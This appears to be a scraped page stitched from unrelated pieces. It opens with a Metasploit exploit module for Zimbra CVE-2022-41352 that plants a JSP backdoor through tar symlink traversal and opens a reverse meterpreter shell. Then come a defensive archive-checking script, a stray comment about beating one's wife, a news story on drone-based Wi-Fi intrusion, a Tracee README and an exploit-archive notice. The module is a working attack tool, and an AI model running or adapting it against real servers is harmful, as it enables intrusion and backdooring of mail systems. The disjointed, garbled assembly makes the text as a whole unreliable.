      include Msf::Exploit::FileDropper

      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'TAR Path Traversal in Zimbra (CVE-2022-41352)',
            'Description' => %q{
              This module creates a .tar file that can be emailed to a Zimbra server
              to exploit CVE-2022-41352. If successful, it plants a JSP-based
              backdoor in the public web directory, then executes that backdoor.

              The core vulnerability is a path-traversal issue in the cpio command-line
              utility that can extract an arbitrary file to an arbitrary
              location on a Linux system (CVE-2015-1197). Most Linux distros have
              chosen not to fix it.

              This issue is exploitable on Red Hat-based systems (and other hosts
              without pax installed) running versions:

              * Zimbra Collaboration Suite 9.0.0 Patch 26 (and earlier)
              * Zimbra Collaboration Suite 8.8.15 Patch 33 (and earlier)

              The patch simply makes "pax" a pre-requisite.
            },
            'Author' => [
              'Alexander Cherepanov', # PoC (in 2015)
              'yeak', # Initial report
              'Ron Bowes', # Analysis, PoC, and module
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2022-41352'],
              ['URL', 'https://forums.zimbra.org/viewtopic.php?t=71153&p=306532'],
              ['URL', 'https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/'],
              ['URL', 'https://www.openwall.com/lists/oss-security/2015/01/18/7'],
              ['URL', 'https://lists.gnu.org/archive/html/bug-cpio/2015-01/msg00000.html'],
              ['URL', 'https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis'],
              ['URL', 'https://attackerkb.com/topics/FdLYrGfAeg/cve-2015-1197/rapid7-analysis'],
              ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27'],
              ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P34'],
            ],
            'Platform' => 'linux',
            'Arch' => [ARCH_X86, ARCH_X64],
            'Targets' => [
              [ 'Zimbra Collaboration Suite', {} ]
            ],
            'DefaultOptions' => {
              'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
              'TARGET_PATH' => '/opt/zimbra/jetty_base/webapps/zimbra/',
              'TARGET_FILENAME' => nil,
              'DisablePayloadHandler' => false,
              'RPORT' => 443,
              'SSL' => true
            },
            'Stance' => Msf::Exploit::Stance::Passive,
            'DefaultTarget' => 0,
            'Privileged' => false,
            'DisclosureDate' => '2022-06-28',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )

        register_options(
          [
            OptString.new('FILENAME', [ false, 'The file name.', 'payload.tar']),

            # Separating the path, filename, and extension allows us to randomize the filename
            OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (an absolute path - eg, /opt/zimbra/...).']),
            OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: public/<random>.jsp).']),
          ]
        )

        register_advanced_options(
          [
            OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (default: random)']),
            OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),

            # Took this from multi/handler
            OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),
            OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])
          ]
        )
      end

      def exploit
        print_status('Encoding the payload as .jsp')
        payload = Msf::Util::EXE.to_jsp(generate_payload_exe)

        # Small sanity-check
        if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
          print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
        end

        # Generate a filename if needed
        target_filename = datastore['TARGET_FILENAME'] || "public/#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp"
        symlink_filename = datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..10)

        # Sanity check - the file shouldn't exist, but we should be able to do requests to the server
        if datastore['TRIGGER_PAYLOAD']
          print_status('Checking the HTTP connection to the target')
          res = send_request_cgi(
            'method' => 'GET',
            'uri' => normalize_uri(target_filename)
          )

          unless res
            fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)')
          end

          # Break when the file successfully appears
          unless res.code == 404
            fail_with(Failure::Unknown, "Server returned an unexpected result when we attempted to trigger our payload (expected HTTP/404, got HTTP/#{res.code}")
          end
        end

        # Create the file
        begin
          contents = StringIO.new
          Rex::Tar::Writer.new(contents) do |t|
            print_status("Adding symlink to path to .tar file: #{datastore['TARGET_PATH']}")
            t.add_symlink(symlink_filename, datastore['TARGET_PATH'], 0o755)

            print_status("Adding target file to the archive: #{target_filename}")
            t.add_file(File.join(symlink_filename, target_filename), 0o644) do |f|
              f.write(payload)
            end
          end
          contents.seek(0)
          tar = contents.read
          contents.close
        rescue StandardError =>
e fail_with(Failure::BadConfig, "Failed to encode .tar file: #{e}") end file_create(tar) print_good('File created! Email the file above to any user on the target Zimbra server') # Bail if they don't want the payload triggered return unless datastore['TRIGGER_PAYLOAD'] register_file_for_cleanup(File.join(datastore['TARGET_PATH'], target_filename)) interval = datastore['CheckInterval'].to_i print_status("Trying to trigger the backdoor @ #{target_filename} every #{interval}s [backgrounding]...") # This loop is mostly from `multi/handler` stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i timeout = datastore['ListenerTimeout'].to_i loop do break if session_created? break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_filename) ) unless res fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload') end # Break when the file successfully appears if res.code == 200 print_good('Successfully triggered the payload') # This should break when we get to session_created? end Rex::ThreadSafe.sleep(interval) end end end # 0day.today [2022-10-21] # Source: 0day.today
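The archive this module builds has a recognisable shape: a symlink member, followed by a file whose path passes through that symlink. A pre-extraction check for that shape is shown here as an added example; it is not part of the module or of Zimbra, and the function names and sample paths are constructed for illustration.

```python
import io
import posixpath
import tarfile


def find_symlink_traversal(tar_bytes):
    """Return (kind, member_name, link_target) findings for an archive.

    kind is "link-escapes-root" for a symlink whose target is absolute or
    climbs above the extraction directory, and "write-through-link" for a
    member whose path passes through a link stored earlier in the archive.
    """
    findings = []
    links = {}  # normalised member name -> link target
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for member in tar:
            name = posixpath.normpath(member.name)
            # Check each parent directory of this member against the links
            # seen so far; extracting the member would follow that link.
            parent = posixpath.dirname(name)
            while parent not in ("", "/", "."):
                if parent in links:
                    findings.append(("write-through-link", member.name, links[parent]))
                    break
                parent = posixpath.dirname(parent)
            if member.issym():
                target = member.linkname
                links[name] = target
                resolved = posixpath.normpath(
                    posixpath.join(posixpath.dirname(name), target))
                if (posixpath.isabs(target) or resolved == ".."
                        or resolved.startswith("../")):
                    findings.append(("link-escapes-root", member.name, target))
            elif member.islnk():
                links[name] = member.linkname  # hard link: track it as well
    return findings


def build_sample(link_target, file_path):
    """Constructed sample: a symlink named 'docs' plus one harmless text file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("docs")
        link.type = tarfile.SYMTYPE
        link.linkname = link_target
        tar.addfile(link)
        data = b"placeholder\n"
        entry = tarfile.TarInfo(file_path)
        entry.size = len(data)
        tar.addfile(entry, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for finding in find_symlink_traversal(
            build_sample("/srv/app/webroot", "docs/public/note.txt")):
        print(finding)
```

Running the check on attachments before they reach an extractor, and rejecting any archive with a finding, covers the case where the extractor itself follows links.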
-
I think you want to beat your wife and have no reason to, BDSM, Liveleak, etc... in time he'll learn about 314zda too, ... oaza and so on are legit apps for Android, iOS etc... you pay, you block the apps mentioned above for the kid and you can sleep in peace.
-
Check your rooftops: Flying gear caught carrying network-intrusion kit

Modified off-the-shelf drones have been found carrying wireless network-intrusion kit in a very unlikely place.

The idea of using consumer-oriented drones for hacking has been explored over the past decade at security conferences like Black Hat 2016, in both the US and in Europe. Naomi Wu, a DIY tech enthusiast, demonstrated a related project called Screaming Fist in 2017. And in 2013, security researcher Samy Kamkar demonstrated his SkyJack drone, which used a Raspberry Pi to take over other drones via Wi-Fi.

Now these sort of attacks are actually taking place.

Greg Linares, a security researcher, recently recounted an incident that he said occurred over the summer at a US East Coast financial firm focused on private investment. He told The Register that he was not involved directly with the investigation but interacted with those involved as part of his work in the finance sector.

The Register corresponded with an individual affiliated with the affected company who corroborated Linares's account and asked not to be identified owing to a non-disclosure agreement and employment concerns.

In a Twitter thread, Linares said the hacking incident was discovered when the financial firm spotted unusual activity on its internal Atlassian Confluence page that originated from within the company's network.

The company's security team responded and found that the user whose MAC address was used to gain partial access to the company Wi-Fi network was also logged in at home several miles away. That is to say, the user was active off-site but someone within Wi-Fi range of the building was trying to wirelessly use that user's MAC address, which is a red flag. The team then took steps to trace the Wi-Fi signal and used a Fluke system to identify the Wi-Fi device.

"This led the team to the roof, where a 'modified DJI Matrice 600' and a 'modified DJI Phantom' series were discovered," Linares explained.

The Phantom drone was in fine condition and had a modified Wi-Fi Pineapple device, used for network penetration testing, according to Linares. The Matrice drone was carrying a case that contained a Raspberry Pi, several batteries, a GPD mini laptop, a 4G modem, and another Wi-Fi device. It had landed near the building's heating and ventilation system and appeared to be damaged but still operable.

"During their investigation, they determined that the DJI Phantom drone had originally been used a few days prior to intercept a worker's credentials and Wi-Fi," Linares said. "This data was later hard coded into the tools that were deployed with the Matrice."

According to Linares, the tools on the drones were used to target the company's internal Confluence page in order to reach other internal devices using the credentials stored there. The attack, he said, had limited success and is the third cyberattack involving a drone he's seen over the past two years.

"The attackers specifically targeted a limited access network, used by both a third-party and internally, that was not secure due to recent changes at the company (e.g. restructuring/rebranding, new building, new building lease, new network setup or a combination of any of these scenarios)," Linares told The Register.

"This is the reason why this temporary network unfortunately had limited access in order to login (credentials + MAC security). The attackers were using the attack in order to access an internal IT confluence server that contained other credentials for accessing other resources and storing IT procedures."

Long-term problem comes to life

Linares said he had worked on a drone project in 2011 to test network attack capabilities and at the time, power, carry weight, and range were limiting factors.

"We revisited it again in 2015 and drone tech had come a long way," he said. "Now in 2022 we are seeing really amazing drone advancements in power, range, and capabilities (for instance, the amazing synchronized drone shows that China puts out are utterly fantastic)."

"This paired with drone payload options getting smaller and more capable – e.g. Flipper Zero kit – ... make viable attack packages that are reasonable to deploy," said Linares. "Targets in fintech/crypto and supply chain or critical third-party software suppliers would make ideal targets for these attacks where an attacker can easily cover their initial operating costs with immediate financial gain or access to more lucrative targets."

Via theregister.com
-
Armitage?
-
Clear the cache and cookies
-
North Korea is blurred in G map. PS: I didn't hear the video
-
Tracee is a Runtime Security and forensics tool for Linux. It uses Linux eBPF technology to trace your system and applications at runtime, and analyzes collected events in order to detect suspicious behavioral patterns. It is usually delivered as a docker container, but there are other ways you can use it (even create your own customized tracee container).

Watch a quick video demo of Tracee: Check out the Tracee video hub for more videos.

Documentation

The full documentation of Tracee is available at https://aquasecurity.github.io/tracee/dev. You can use the version selector on top to view documentation for a specific version of Tracee.

Quickstart

Before you proceed, make sure you follow the minimum requirements for running Tracee.

1. Running tracee:latest

    docker run \
      --name tracee --rm -it \
      --pid=host --cgroupns=host --privileged \
      -v /etc/os-release:/etc/os-release-host:ro \
      -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
      aquasec/tracee:latest

2. Running tracee:full

    docker run --name tracee --rm -it \
      --pid=host --cgroupns=host --privileged \
      -v /etc/os-release:/etc/os-release-host:ro \
      -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
      -v /usr/src:/usr/src:ro \
      -v /lib/modules:/lib/modules:ro \
      -v /tmp/tracee:/tmp/tracee:rw \
      aquasec/tracee:full

The default (latest) image is lightweight and portable. It is supposed to support different kernel versions without having to build source code. If the host kernel does not support BTF then you may use the full container image. The full container will compile an eBPF object during startup, if you do not have one already cached in /tmp/tracee.

You may need to change the volume mounts for the kernel headers based on your setup. See Linux Headers section for more info.

Tracee supports enriching events with additional data from running containers. In order to enable this capability please look here.

These docker commands run Tracee with default settings and start reporting detections to standard output. In order to simulate a suspicious behavior, you can simply run:

    strace ls

in another terminal. This will trigger the Anti-Debugging signature, which is loaded by default, and you will get a warning:

    INFO: probing tracee-ebpf capabilities...
    INFO: starting tracee-ebpf...
    INFO: starting tracee-rules...
    Loaded 14 signature(s): [TRC-1 TRC-13 TRC-2 TRC-14 TRC-3 TRC-11 TRC-9 TRC-4 TRC-5 TRC-12 TRC-8 TRC-6 TRC-10 TRC-7]
    Serving metrics endpoint at :3366
    Serving metrics endpoint at :4466

    *** Detection ***
    Time: 2022-03-25T08:04:22Z
    Signature ID: TRC-2
    Signature: Anti-Debugging
    Data: map[]
    Command: strace
    Hostname: ubuntu-impish

Trace

In some cases, you might want to leverage Tracee's eBPF event collection capabilities directly, without involving the detection engine. This might be useful for debugging, troubleshooting, analysing, researching OR education.

Execute docker container with the word trace as an initial argument, and tracee-ebpf will be executed, instead of the full tracee detection engine.

    docker run \
      --name tracee --rm -it \
      --pid=host --cgroupns=host --privileged \
      -v /etc/os-release:/etc/os-release-host:ro \
      -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
      aquasec/tracee:latest \
      trace

Components

Tracee is composed of the following sub-projects, which are hosted in the aquasecurity/tracee repository:

- Tracee-eBPF - Linux Tracing and Forensics using eBPF
- Tracee-Rules - Runtime Security Detection Engine

Tracee is an Aqua Security open source project. Learn about our open source work and portfolio Here. Join the community, and talk to us about any matter in GitHub Discussion or Slack.

Download: tracee-main.zip
or
git clone https://github.com/aquasecurity/tracee.git

Source
-
This archive contains all of the 118 exploits added to Packet Storm in September, 2022.

Download: 202209-exploits.tgz (351 KB)

Source